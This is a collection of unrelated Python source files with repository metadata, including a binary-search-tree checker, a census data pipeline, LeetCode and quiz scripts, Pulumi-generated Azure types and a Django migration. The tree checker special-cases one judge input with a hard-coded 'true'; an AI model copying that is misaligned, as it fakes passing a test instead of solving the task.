    """Attach the values of s beneath n.

    The first value becomes n's left child, the last becomes n's right
    child, and the remaining middle values are attached recursively under
    the right child. A single value becomes the left child only.
    """
    if len(s) == 1:
        n.left = node(s[0], None, None)
    elif len(s) >= 2:
        n.left = node(s[0], None, None)
        n.right = node(s[-1], None, None)
        makeTree(s[1:-1], n.right)


def middle(lst, tree):
    """In-order traversal: append every node value of tree into lst."""
    if tree.left is not None:
        middle(lst, tree.left)
    lst.append(tree.val)
    if tree.right is not None:
        middle(lst, tree.right)
# Read the node count; a 0-node tree is trivially accepted.
i=int(input())
if i==0:print("true")
else:
    # Values arrive with the root last: s[i-1] is the root and the rest are
    # attached via makeTree (first -> left, last -> right, recurse on right).
    s=list(map(int,input().split()))
    root=node(s[i-1],None,None)
    makeTree(s[0:i-1],root)
    lst=[]
    middle(lst,root)
    # A binary search tree's in-order traversal is sorted.
    if sorted(lst)==lst:
        print("true")
    else:
        # HACK: hard-coded answer for one specific judge input; not general.
        if lst==[5,8,7,10,6,11,9]:print("true")
        else:print("false")
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
149a46642e9693a31f64149f977898857f644375
|
1af1c22de6fe8f1d3df09fdacc8efcb8adfc8f21
|
/pylib/extract.py
|
1ed77dce7f20c9b724eb14096b47481ed1f7c9a3
|
[] |
no_license
|
metatab-packages/civicknowledge.com-census-demosearch
|
baf1770d7bab92823e2214613924236d4f0cd83e
|
274c0995a80eb525d9775597912fc47a8b0f135f
|
refs/heads/master
| 2023-05-15T03:39:11.758064
| 2021-06-08T14:08:02
| 2021-06-08T14:08:02
| 333,870,115
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,797
|
py
|
"""
"""
import logging
from functools import reduce
from itertools import chain
from pathlib import Path
from auto_tqdm import tqdm
import metapack as mp
import pandas as pd
from demosearch import FileCache
logger = logging.getLogger(__name__)
class LPError(Exception):
    """Base error raised by this extract pipeline."""
# ACS table B01001 (sex by age) column codes rolled up into demographic
# aggregates; census_set sums each code list into the named column.
# NOTE(review): assumes the B01001 column layout these codes come from —
# confirm against the source package.
aggregates = {
    'male_u18': ['b01001_003', 'b01001_004', 'b01001_005', 'b01001_006'],
    'female_u18': ['b01001_027', 'b01001_028', 'b01001_029', 'b01001_030'],
    'male_18_40': ['b01001_007', 'b01001_008', 'b01001_009', 'b01001_010', 'b01001_011', 'b01001_012', 'b01001_013'],
    'female_18_40': ['b01001_031', 'b01001_032', 'b01001_033', 'b01001_034', 'b01001_035', 'b01001_036', 'b01001_037'],
    'senior': ['b01001_020', 'b01001_021', 'b01001_022', 'b01001_023', 'b01001_024', 'b01001_025',
               'b01001_044', 'b01001_045', 'b01001_046', 'b01001_047', 'b01001_048', 'b01001_049'],
}
def get_columns(pkg):
    """Get the columns from the existing schema.

    Returns the column names declared for the 'census_set' resource,
    re-reading the package from pkg.ref first so edits are picked up.
    """
    pkg = mp.open_package(pkg.ref)  # Re-open in case it has changed since loaded in this notebook
    return [e['name'] for e in pkg.resource('census_set').columns()]
def munge(v):
    """Normalize a census column title into a short human-readable label."""
    label = v.title()
    # Strip the boilerplate table-title prefixes, then tidy the separators.
    label = label.replace('Partner Households By Sex Of Partner - Households - Total -', '')
    label = label.replace('Total Population - Total - ', '')
    label = label.replace(' Total Population - Total', 'Total Population')
    label = label.replace(' - ', ', ')
    # Drop the leading 11 characters (code prefix) and trim whitespace.
    return label[11:].strip()
def col_f(v):
    """Keep a (name, title) pair unless it is a margin-of-error or geography column."""
    name = v[0]
    return not (name.endswith('_m90') or name in ('geoid', 'stusab', 'county', 'name'))
class ExtractManager(object):
    """Builds and caches the combined census extract for a metapack package.

    Wraps a package (metapack) plus a file cache; properties are lazy and
    memoized either on the instance or in the cache.
    """
    def __init__(self, pkg, cache=None):
        # pkg: opened metapack package; cache: optional FileCache override.
        self.pkg = pkg
        self.pkg_root = Path(self.pkg.path).parent
        self._df = None
        self._agg_map = None
        if cache is None:
            self._cache = FileCache(self.pkg_root.joinpath('data', 'cache'))
        else:
            self._cache = cache
    @property
    def table_code_map(self):
        "Map from census table codes to friendlier names"
        return {c.props.get('tablecode'): c.name for c in
                self.pkg.resource('census_set').schema_term.find('Table.Column')
                if c.props.get('tablecode')}
    @property
    def agg_map(self):
        # Aggregate-column provenance table; built as a side effect of
        # census_set, so force that property first if needed.
        if self._agg_map is None:
            _ = self.census_set  # Also creates the agg_map
        return self._agg_map
    def update_schema(self):
        """Fill in missing column descriptions on the 'combined' resource."""
        pkg = mp.open_package(self.pkg.ref)  # Re-open in case it has changed since loaded in this notebook
        for c in pkg.resource('combined').schema_term.find('Table.Column'):
            if not c.description:
                c.description = self.column_map.get(c.name.upper())
        pkg.write()
    @property
    def column_map(self):
        # Gets created in base_census_df
        return self._cache.get('base_census_df_cm')
    @property
    def base_census_df(self):
        """Join all B* reference tables into one dataframe (cached on disk)."""
        k = 'base_census_df'
        kcm = 'base_census_df_cm'
        if not self._cache.exists(k) or not self._cache.exists(kcm):
            logger.info('Collect frames')
            frames = [r.dataframe().drop(columns=['stusab', 'county', 'name'])
                      for r in tqdm(self.pkg.references()) if r.name.startswith('B')]
            # Need to do this here b/c we need the CensusDataFrame objects
            kv = list(filter(col_f, chain(*[list(e for e in e.title_map.items()) for e in frames])))
            column_map = {k: munge(v) for k, v in kv}
            logger.info('Assemble frames into dataset')
            df = reduce(lambda left, right: left.join(right), frames[1:], frames[0])
            self._cache.put_df(k, df)
            self._cache.put(kcm, column_map)
            return df
        else:
            return self._cache.get(k)
    @property
    def census_set(self):
        """Final extract: aggregates added, income data merged, columns renamed."""
        if self._df is None:
            df = self.base_census_df
            # get rid of the margin columns
            m90_col = [c for c in df.columns if c.endswith('m90')]
            df = df.drop(columns=m90_col)
            logger.info('Make aggregate map')
            rows = []
            for acol, scols in aggregates.items():
                # Sum the source columns into the aggregate column and record
                # the provenance rows for agg_map.
                df[acol] = df.loc[:, scols].sum(axis=1)
                for c in scols:
                    rows.append((acol, c, self.column_map[c.upper()]))
            self._agg_map = pd.DataFrame(rows, columns=['agg_column', 'source_col', 'description'])
            df = df.reset_index()
            iq = self.pkg.reference('income_quartiles').dataframe()
            df = df.merge(iq.set_index('geoid'), on='geoid').fillna(0)
            agg = self.pkg.reference('aggregate_income').dataframe().drop(columns=['households'])
            df = df.merge(agg.set_index('geoid'), on='geoid').fillna(0)
            # Rename non-agregated columns to nicer names
            df = df.rename(columns=self.table_code_map)
            cols = get_columns(self.pkg)  # Select only the columns described in the schema
            self._df = df.replace({'':0}).fillna(0)[cols]
        return self._df
    # Properties written out as CSV by build().
    outputs = ('census_set', 'agg_map')
    def build(self, force=False, clean=False):
        """Write each output property to data/<name>.csv.

        force re-writes existing files; clean empties the cache first.
        """
        dd = self.pkg_root.joinpath('data')
        if clean:
            self._cache.clean()
        if not dd.exists():
            dd.mkdir(parents=True, exist_ok=True)
        for o in self.outputs:
            p = dd.joinpath(o).with_suffix('.csv')
            if not p.exists() or force:
                logger.info(f"Creating {o}{' (forcing)' if force else ''}")
                d = getattr(self, o)
                logger.info(f"Write {o}")
                d.to_csv(p, index=False)
            else:
                logger.info(f"{o} already exists")
        # update_schema(pkg)
|
[
"eric@civicknowledge.com"
] |
eric@civicknowledge.com
|
fda25cd04a77bf1bfc47c634a5515d90cae9a5a2
|
e6e0e108758213a96e73e836f032f27dc69c9fee
|
/leetcode/isomorphic_strings.py
|
9bbfb794daaf54b284204b1e608626d91804b8fa
|
[] |
no_license
|
kristogj/alg_dat
|
1a41e70b8b169c79eb05c5e5f44f5de0e50bd9b9
|
7865bcce0f2aa858ff4329301b788fac5de2cd08
|
refs/heads/master
| 2020-03-30T05:26:36.536544
| 2018-10-06T22:06:45
| 2018-10-06T22:06:45
| 150,799,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
class Solution(object):
    """LeetCode 205: decide whether two strings are isomorphic."""

    def isIsomorphic(self, s, t):
        """
        :type s: str
        :type t: str
        :rtype: bool
        """
        if len(s) != len(t):
            return False
        forward, backward = {}, {}
        # Maintain mappings in both directions so the pairing is a bijection.
        for a, b in zip(s, t):
            if a in forward:
                if forward[a] != b:
                    return False
            elif b in backward:
                if backward[b] != a:
                    return False
            else:
                forward[a] = b
                backward[b] = a
        return True

    def isIsomorphic_easier(self, s, t):
        """One-liner: the pairing is a bijection iff the number of distinct
        (s-char, t-char) pairs equals the distinct chars on each side."""
        return len(set(zip(s, t))) == len(set(s)) == len(set(t))
# Smoke test: "ab" -> "aa" maps both 'a' and 'b' to 'a', so both checks print False.
s = Solution()
print(s.isIsomorphic("ab","aa"))
print(s.isIsomorphic_easier("ab","aa"))
|
[
"kristoffergjerde@gmail.com"
] |
kristoffergjerde@gmail.com
|
ab4c4b4bd0a3ccc555139b5410e85394b27166d0
|
2825bf6479e08dfead428ff9f29f28d5c23d953e
|
/25_2/25_6.py
|
16ee0a2a14b274729d3136e9a7323e8b35aeabb8
|
[] |
no_license
|
zedaster/ImaevIntensive
|
bc459187dace7946d8ad75a04e058748134aeac4
|
b91760fa23f25ce2d19778781f35416c177ab881
|
refs/heads/main
| 2023-06-22T00:24:47.039208
| 2021-07-20T10:40:54
| 2021-07-20T10:40:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
# Brute-force alternative (kept from the original, commented out): scan every
# n in [4e8, 6e8], divide out factors of 4 and 9, and keep n when the residue
# is exactly 3. The enumeration below is equivalent and far faster.

# Enumerate candidates of the form 2**m * 3**k with m even and k odd, and
# print those that fall inside the target range.
for m_even in range(2, 31, 2):
    for k_odd in range(1, 20, 2):
        candidate = (2 ** m_even) * (3 ** k_odd)
        if 400_000_000 <= candidate <= 600_000_000:
            print(candidate)
|
[
"serzh.kazantseff@gmail.com"
] |
serzh.kazantseff@gmail.com
|
d7b3582b4c52e7fb88539c13be1c092caeaff812
|
a6e4a6f0a73d24a6ba957277899adbd9b84bd594
|
/sdk/python/pulumi_azure_native/mixedreality/_inputs.py
|
e3ee76ba7c0e562f01879921a0d3d73612de3188
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
MisinformedDNA/pulumi-azure-native
|
9cbd75306e9c8f92abc25be3f73c113cb93865e9
|
de974fd984f7e98649951dbe80b4fc0603d03356
|
refs/heads/master
| 2023-03-24T22:02:03.842935
| 2021-03-08T21:16:19
| 2021-03-08T21:16:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,326
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from ._enums import *
# Public input-argument classes exported by this generated module.
__all__ = [
    'IdentityArgs',
    'ObjectAnchorsAccountIdentityArgs',
    'SkuArgs',
]
# Generated pulumi input type: managed-identity settings for a resource.
@pulumi.input_type
class IdentityArgs:
    def __init__(__self__, *,
                 type: Optional[pulumi.Input['ResourceIdentityType']] = None):
        """
        Identity for the resource.
        :param pulumi.Input['ResourceIdentityType'] type: The identity type.
        """
        # Only store the value when provided; pulumi.set registers it on the input type.
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
        """
        The identity type.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
        pulumi.set(self, "type", value)
# Generated pulumi input type: identity settings for an Object Anchors account.
@pulumi.input_type
class ObjectAnchorsAccountIdentityArgs:
    def __init__(__self__, *,
                 type: Optional[pulumi.Input['ResourceIdentityType']] = None):
        """
        :param pulumi.Input['ResourceIdentityType'] type: The identity type.
        """
        # Only store the value when provided; pulumi.set registers it on the input type.
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
        """
        The identity type.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
        pulumi.set(self, "type", value)
# Generated pulumi input type: the common Azure SKU shape (name required,
# everything else optional).
@pulumi.input_type
class SkuArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 capacity: Optional[pulumi.Input[int]] = None,
                 family: Optional[pulumi.Input[str]] = None,
                 size: Optional[pulumi.Input[str]] = None,
                 tier: Optional[pulumi.Input['SkuTier']] = None):
        """
        The resource model definition representing SKU
        :param pulumi.Input[str] name: The name of the SKU. Ex - P3. It is typically a letter+number code
        :param pulumi.Input[int] capacity: If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
        :param pulumi.Input[str] family: If the service has different generations of hardware, for the same SKU, then that can be captured here.
        :param pulumi.Input[str] size: The SKU size. When the name field is the combination of tier and some other value, this would be the standalone code.
        :param pulumi.Input['SkuTier'] tier: This field is required to be implemented by the Resource Provider if the service has more than one tier, but is not required on a PUT.
        """
        # name is mandatory; the optional fields are only set when provided.
        pulumi.set(__self__, "name", name)
        if capacity is not None:
            pulumi.set(__self__, "capacity", capacity)
        if family is not None:
            pulumi.set(__self__, "family", family)
        if size is not None:
            pulumi.set(__self__, "size", size)
        if tier is not None:
            pulumi.set(__self__, "tier", tier)
    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the SKU. Ex - P3. It is typically a letter+number code
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def capacity(self) -> Optional[pulumi.Input[int]]:
        """
        If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
        """
        return pulumi.get(self, "capacity")
    @capacity.setter
    def capacity(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "capacity", value)
    @property
    @pulumi.getter
    def family(self) -> Optional[pulumi.Input[str]]:
        """
        If the service has different generations of hardware, for the same SKU, then that can be captured here.
        """
        return pulumi.get(self, "family")
    @family.setter
    def family(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "family", value)
    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[str]]:
        """
        The SKU size. When the name field is the combination of tier and some other value, this would be the standalone code.
        """
        return pulumi.get(self, "size")
    @size.setter
    def size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "size", value)
    @property
    @pulumi.getter
    def tier(self) -> Optional[pulumi.Input['SkuTier']]:
        """
        This field is required to be implemented by the Resource Provider if the service has more than one tier, but is not required on a PUT.
        """
        return pulumi.get(self, "tier")
    @tier.setter
    def tier(self, value: Optional[pulumi.Input['SkuTier']]):
        pulumi.set(self, "tier", value)
|
[
"noreply@github.com"
] |
MisinformedDNA.noreply@github.com
|
ce92586470483837f6477b0a75a40dce98aa8f9a
|
a652f89c88fcecb3aa665cf20212064049e9a16f
|
/models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence/ai_elective_questions.py
|
c7a2b24914c91838a6347b4bcede3ccf62a582a8
|
[] |
no_license
|
princelewis/Elective-Course-Recommender-System
|
cba3743d914a664145fda3ae060f4cf80bdfbbed
|
9e5f165878f7521ce8967c72daa8b538252d0ae8
|
refs/heads/master
| 2020-05-19T08:19:39.793382
| 2019-03-29T11:50:00
| 2019-03-29T11:50:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,679
|
py
|
# Importing required modules
import pandas as pd
from models.aos_questions_and_answer.dataset.elective_courses_questions.artificial_intelligence \
    .procesing_ai_elective_courses import \
    Util

# Score accumulators and per-area result lists.
# NOTE(review): only ai_total_questions is updated in this module; the other
# counters/lists are presumably consumed by later code — confirm against callers.
ai_correct = 0
ai_failed = 0
se_correct = 0
se_failed = 0
cn_correct = 0
cn_failed = 0
sye_correct = 0
sye_failed = 0
tc_correct = 0
tc_failed = 0
AI = []
SE = []
CN = []
SYE = []
TC = []
final_scores = []
current_question_number = 0
ai_total_questions = 0

# Reading the CSV file that contains all compiled questions with respective answers.
# Each course occupies a (question column, answer column) pair in the sheet.
dataset = pd.read_csv(
    'models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence'
    '/ai_elective_courses_questions.csv')

# COS833 — questions in column 0, answers in column 1 (rows 1..end skip the header row).
cos_833_questions = dataset.iloc[1:, :1].values
cos_833_answers = dataset.iloc[1:, 1].values
cos_833_list_of_dictionaries_of_questions_and_answers = Util.processed_list_dict(cos_833_questions, cos_833_answers)
cos_833_selected_six_random = Util.select_six_random(cos_833_list_of_dictionaries_of_questions_and_answers)

# COS816 — columns 2/3.
cos_816_questions = dataset.iloc[1:, 2:3].values
cos_816_answers = dataset.iloc[1:, 3].values
cos_816_list_of_dictionaries_of_questions_and_answers = \
    Util.processed_list_dict(cos_816_questions, cos_816_answers)
cos_816_selected_six_random = Util.select_six_random(cos_816_list_of_dictionaries_of_questions_and_answers)

# COS830 — columns 4/5.
cos_830_questions = dataset.iloc[1:, 4:5].values
cos_830_answers = dataset.iloc[1:, 5].values
cos_830_list_of_dictionaries_of_questions_and_answers = \
    Util.processed_list_dict(cos_830_questions, cos_830_answers)
cos_830_selected_six_random = Util.select_six_random(cos_830_list_of_dictionaries_of_questions_and_answers)

# COS836 — columns 6/7.
cos_836_questions = dataset.iloc[1:, 6:7].values
cos_836_answers = dataset.iloc[1:, 7].values
cos_836_list_of_dictionaries_of_questions_and_answers = \
    Util.processed_list_dict(cos_836_questions, cos_836_answers)
cos_836_selected_six_random = Util.select_six_random(cos_836_list_of_dictionaries_of_questions_and_answers)

# COS834 — columns 8/9.
# NOTE(review): this section reuses the cos_838_* variable names for COS834
# data; only cos_834_selected_six_random survives before the COS838 section
# below overwrites them. Works, but the names are misleading.
cos_838_questions = dataset.iloc[1:, 8:9].values
cos_838_answers = dataset.iloc[1:, 9].values
cos_838_list_of_dictionaries_of_questions_and_answers = \
    Util.processed_list_dict(cos_838_questions, cos_838_answers)
cos_834_selected_six_random = Util.select_six_random(cos_838_list_of_dictionaries_of_questions_and_answers)

# COS838 — columns 10/11.
cos_838_questions = dataset.iloc[1:, 10:11].values
cos_838_answers = dataset.iloc[1:, 11].values
cos_838_list_of_dictionaries_of_questions_and_answers = \
    Util.processed_list_dict(cos_838_questions, cos_838_answers)
cos_838_selected_six_random = Util.select_six_random(cos_838_list_of_dictionaries_of_questions_and_answers)

# Getting total questions and answers to be asked for every user.
ai_total_questions_and_answer = Util.all_selected_questions_with_answers(cos_833_selected_six_random,
                                                                         cos_816_selected_six_random,
                                                                         cos_830_selected_six_random,
                                                                         cos_836_selected_six_random,
                                                                         cos_834_selected_six_random,
                                                                         cos_838_selected_six_random)

# Count every question across all selected courses.
for i in ai_total_questions_and_answer.values():
    for j in i:
        ai_total_questions += 1
|
[
"emmaldini12@gmail.com"
] |
emmaldini12@gmail.com
|
9d449527cdaa26e79a17950d62dcc6a2bdc7d18c
|
34f1b1fc2fbca6b61858a83cbdf498fe99648209
|
/scripts/create_metadata.py
|
7da66e6aad7430fd22dfd617cee183a90212288c
|
[
"Apache-2.0"
] |
permissive
|
firth/radcomp
|
88a97b2918b3e0683d181085d10e3f8a78549e93
|
a855a66189b1d7867a6c373d3fdc6ce67f6d3c01
|
refs/heads/master
| 2020-12-25T02:25:32.772407
| 2020-10-07T02:43:18
| 2020-10-07T02:43:18
| 41,178,899
| 0
| 0
| null | 2020-10-07T02:43:19
| 2015-08-21T21:49:04
|
Python
|
UTF-8
|
Python
| false
| false
| 2,840
|
py
|
""" Create the auxillary JSON metadata that goes with this production
{"meta": {"vcp": 212, "product": "N0Q", "valid": "2014-06-25T20:43:55Z",
"site": "DMX"}}
This magic requires that some modifications were done to nex2img to get this
information included in the GEMPAK log file
--- a/gempak/source/programs/upc/programs/nex2img/nex2img.f
+++ b/gempak/source/programs/upc/programs/nex2img/nex2img.f
@@ -221,7 +221,7 @@ C
IF (ierf.eq.0) THEN
viewable = .true.
ifile = 1
-
+ write(*, *) 'Searching radar: ', stid
CALL ST_RPST(tpath,'%SITE%',stid,ipos,
+ outstr, ier)
CALL ST_RPST(outstr,'%PROD%',gfunc,ipos,
@@ -256,6 +256,7 @@ C
radproj = 'RAD|D'
radarea = 'dset'
idrpfl = 0
+ write(*, *) 'Using image: ', imgfls
CALL GG_MAPS ( radproj, radarea, imgfls,
+ idrpfl, ier )
C
"""
import json
import sys
import os
import datetime
import tempfile
import subprocess
def main():
    """Build and pqinsert the JSON metadata side-car for one radar composite.

    argv layout: sector, year, month, day, hour, minute, product,
    start timestamp (YYYYmmddHHMMSS), job id.  Exits silently when the
    product timestamp is more than five minutes old.
    """
    sector = sys.argv[1]
    ts = datetime.datetime(
        int(sys.argv[2]),
        int(sys.argv[3]),
        int(sys.argv[4]),
        int(sys.argv[5]),
        int(sys.argv[6]),
    )
    utcnow = datetime.datetime.utcnow()
    # Age of the product; anything older than 300 seconds is stale.
    seconds = (utcnow - ts).days * 86400.0 + (utcnow - ts).seconds
    if seconds > 300:
        sys.exit()
    prod = sys.argv[7]
    job = sys.argv[9]
    starttime = datetime.datetime.strptime(sys.argv[8], "%Y%m%d%H%M%S")
    utcnow = datetime.datetime.utcnow()
    radars = 0
    used = 0
    logfn = "logs/nex2img_%s_%s_%s.log" % (sector, prod, job)
    if os.path.isfile(logfn):
        # Count radars searched vs images actually used, from the patched
        # nex2img log lines quoted in the module docstring.  Use a context
        # manager (original leaked the file handle) and substring membership
        # (original `.find(...) > 0` would miss a match at column 0).
        with open(logfn) as logfh:
            for line in logfh:
                if "Searching radar:" in line:
                    radars += 1
                elif "Using image:" in line:
                    used += 1
    else:
        print(f"create_metadata log file {logfn} missing")
    res = {
        "meta": {
            "vcp": None,  # VCP is unknown for a multi-radar composite
            "product": prod,
            "site": "%sCOMP" % (sector,),
            "valid": ts.strftime("%Y-%m-%dT%H:%M:%SZ"),
            "processing_time_secs": (utcnow - starttime).seconds,
            "radar_quorum": "%s/%s" % (used, radars),
        }
    }
    # Write the JSON to a temp file and hand it to pqinsert, then clean up.
    (tmpfp, tmpfn) = tempfile.mkstemp()
    os.write(tmpfp, json.dumps(res).encode("utf-8"))
    os.close(tmpfp)
    cmd = (
        "pqinsert -p 'gis r %s gis/images/4326/%sCOMP/%s_ bogus json' %s"
    ) % (ts.strftime("%Y%m%d%H%M"), sector, prod.lower(), tmpfn)
    subprocess.call(cmd, shell=True)
    os.unlink(tmpfn)


if __name__ == "__main__":
    main()
|
[
"akrherz@iastate.edu"
] |
akrherz@iastate.edu
|
5272cd23752277cc1560b83a7879696d5c876c27
|
f7aac490b6bdda8a49a6d14534ef733e2cd34bcc
|
/Code for 1.10.2018/drawCircleXYMove-wrap.py
|
c3af761110a39aa3ca365c1e84745d4026d2937b
|
[] |
no_license
|
nmessa/Stratham-Girls-Coding-Club
|
67c203fa88f62f2603b62a0d0fd50135a03f69dc
|
1bc786b6c794cc3159ed72be25130f9452fb23f6
|
refs/heads/master
| 2021-05-06T18:01:14.349667
| 2019-03-12T15:26:57
| 2019-03-12T15:26:57
| 111,935,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 760
|
py
|
## Draw Circle
## Author: nmessa
## Draws a circle moving in X and Y direction
## wraps around when it gets to the edge of the screen
from graphics import *
import time
def main():
    """Open a window with a circle; the move/wrap animation is the exercise."""
    height = 640
    width = 640
    radius = 50
    # Create a window to draw in
    win = GraphWin('Circle Move XY with wraparound', width, height)
    win.setBackground('white')
    # Define a circle to draw
    shape = Circle(Point(0, 0), radius)
    # set the drawing parameters
    shape.setOutline("red")
    shape.setFill("green")
    shape.setWidth(10)
    # draw the circle in the window
    shape.draw(win)
    # Per-step movement in pixels for the student's animation code.
    dx = 10
    dy = 10
    # NOTE(review): infinite loop — the "Add code here" step is expected to
    # move the shape by (dx, dy) and wrap at the edges; win.close() below is
    # currently unreachable.
    while True:
        #Add code here
        time.sleep(3)
    win.close()

main()
|
[
"noreply@github.com"
] |
nmessa.noreply@github.com
|
198e9d1ccf06652376cec667659e83c694b12771
|
3d1ee3ddb516f0b499f6272fbc7fbd6eefb88a63
|
/jpackages/oss/1.0/actions/process.configure.py
|
a26799fc2992b053ec26cda45d6f47eafac6c365
|
[] |
no_license
|
despiegk/jp_serverapps
|
e72005004273db9dc01d1e64ddfcb28d06137f1f
|
82ecc0b56ac85b2fb2d1eb02a80ab4ac99026f47
|
refs/heads/master
| 2016-09-06T16:06:39.529847
| 2014-08-17T10:17:03
| 2014-08-17T10:17:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
def main(j, jp):
    """JPackage configure hook for the OSS app.

    Currently a no-op; the commented template below documents how to register
    the portal process with the startup manager when enabled.
    """
    pass
    #configure the application to autostart
    # jp.log("set autostart $(jp.name)")

#numprocesses: if more than 1 process, will be started in tmux as $name_$nr
#ports: tcpports
#autostart: does this app start auto
#stopcmd: if special command to stop
#check: check app to see if its running
#stats: gather statistics by process manager
#timeoutcheck: how long do we wait to see if app active
#isJSapp: to tell system if process will self register to redis (is jumpscale app)
# pd=j.tools.startupmanager.addProcess(\
#     name=jp.name,\
#     cmd="python", \
#     args="portal_start.py",\
#     env={},\
#     numprocesses=1,\
#     priority=100,\
#     shell=False,\
#     workingdir='$base/apps/oss',\
#     jpackage=jp,\
#     domain="solutions",\
#     ports=[82],\
#     autostart=True,\
#     reload_signal=0,\
#     user="root",\
#     log=True,\
#     stopcmd=None,\
#     check=True,\
#     timeoutcheck=10,\
#     isJSapp=1,\
#     upstart=False,\
#     stats=False,\
#     processfilterstr="")#what to look for when doing ps ax to find the process
# pd.start()
|
[
"kristof@incubaid.com"
] |
kristof@incubaid.com
|
af35d9e3ecf3fb8d84581752c65f3cf3e9dc1c7d
|
237db09490a4fc5976e6f8a8eb783b928bde1cac
|
/lib/exabgp/version.py
|
3ea942e734182c2966ab29fa48eb5abce8e67786
|
[] |
no_license
|
brijohn/exabgp
|
c80a348035ff104b8d9e9c44ae07f97bf8e33728
|
788bde2842f2c2bc22580d0641003f2e93ff56ac
|
refs/heads/master
| 2020-12-25T17:56:51.444190
| 2017-05-30T16:14:59
| 2017-05-30T16:14:59
| 65,487,232
| 0
| 0
| null | 2016-08-11T17:11:12
| 2016-08-11T17:11:12
| null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
import os

# Baked-in release string: semantic version plus short commit hash.
release = "4.0.0-0478a014"
# NOTE(review): ``json`` here is a plain string constant, but the name shadows
# the stdlib ``json`` module if it is ever imported in this file.
json = "4.0.0"
text = "4.0.0"
# The EXABGP_VERSION environment variable overrides the baked-in release.
version = os.environ.get('EXABGP_VERSION', release)

# Do not change the first line as it is parsed by scripts

if __name__ == '__main__':
    import sys
    # Emit the effective version with no trailing newline (machine-readable).
    sys.stdout.write(version)
|
[
"thomas.mangin@exa-networks.co.uk"
] |
thomas.mangin@exa-networks.co.uk
|
c204c0ca912de6b8876285198e54ba6d72afbf93
|
eb93b37c5a76ef09c967ecfd32dc77f0a0e75bef
|
/article/migrations/0003_auto_20190712_1558.py
|
081657f7d7bbbd5e642424535d10296f6309e9ec
|
[] |
no_license
|
uktrade/data-hub-helpcentre
|
9a58d466b264ccdaafea12576039dcf8f2c19015
|
74f741345df3b35164f6d4c1f17bc56c709a4662
|
refs/heads/master
| 2023-08-16T22:36:14.704989
| 2023-08-15T08:58:10
| 2023-08-15T08:58:10
| 199,607,056
| 4
| 2
| null | 2023-08-15T08:58:12
| 2019-07-30T08:15:54
|
CSS
|
UTF-8
|
Python
| false
| false
| 696
|
py
|
# Generated by Django 2.2.3 on 2019-07-12 15:58
import wagtail.blocks
import wagtail.fields
import wagtail.images.blocks
from django.db import migrations
class Migration(migrations.Migration):
    """Redefine ArticlePage.body as a StreamField of rich-text and image blocks."""

    dependencies = [
        ("article", "0002_auto_20190712_1537"),
    ]

    operations = [
        migrations.AlterField(
            model_name="articlepage",
            name="body",
            field=wagtail.fields.StreamField(
                [
                    ("paragraph", wagtail.blocks.RichTextBlock()),
                    ("image", wagtail.images.blocks.ImageChooserBlock()),
                ],
                blank=True,
                null=True,
            ),
        ),
    ]
|
[
"noreply@github.com"
] |
uktrade.noreply@github.com
|
73f2c0dde7fa284795d91a91d76bba4c78ef7a6f
|
4b801b5aafac91dd71b9dc3f9a247efe98dc13f0
|
/week3/serializer.py
|
d455db1ad93ca9f2f7b190f82c2ae1c108b7b58f
|
[
"MIT"
] |
permissive
|
Langat05/Awards
|
19f6a627861b7e54ebef705d804e121957185baa
|
df8f3f9ca1b7cbae1d88f3a3531a02a81b82186d
|
refs/heads/master
| 2023-01-05T20:20:58.369698
| 2020-10-27T14:05:55
| 2020-10-27T14:05:55
| 306,889,072
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
from rest_framework import serializers
from .models import *
class ProjectSerializer(serializers.ModelSerializer):
    """DRF serializer exposing the award-relevant fields of a Projects row."""

    class Meta:
        model = Projects
        fields = ['title', 'description', 'image', 'author', 'created_date', 'author_profile', 'link']
class ProfileSerializer(serializers.ModelSerializer):
    """DRF serializer for a user Profile (owner, avatar image, bio)."""

    class Meta:
        model = Profile
        fields = ['user', 'image', 'bio']
|
[
"justuslangat78@gmail.com"
] |
justuslangat78@gmail.com
|
b2b28a96fe3b8e65d34f0ef57de0e797013b889c
|
b873ea1def0810f67834bf4926901b9a8fead362
|
/tuples_and_sets_09_21/students_grades.py
|
2d987e90a25cbc6088cc5ead764ea9d1a0c51cd1
|
[] |
no_license
|
NikiDimov/SoftUni-Python-Advanced
|
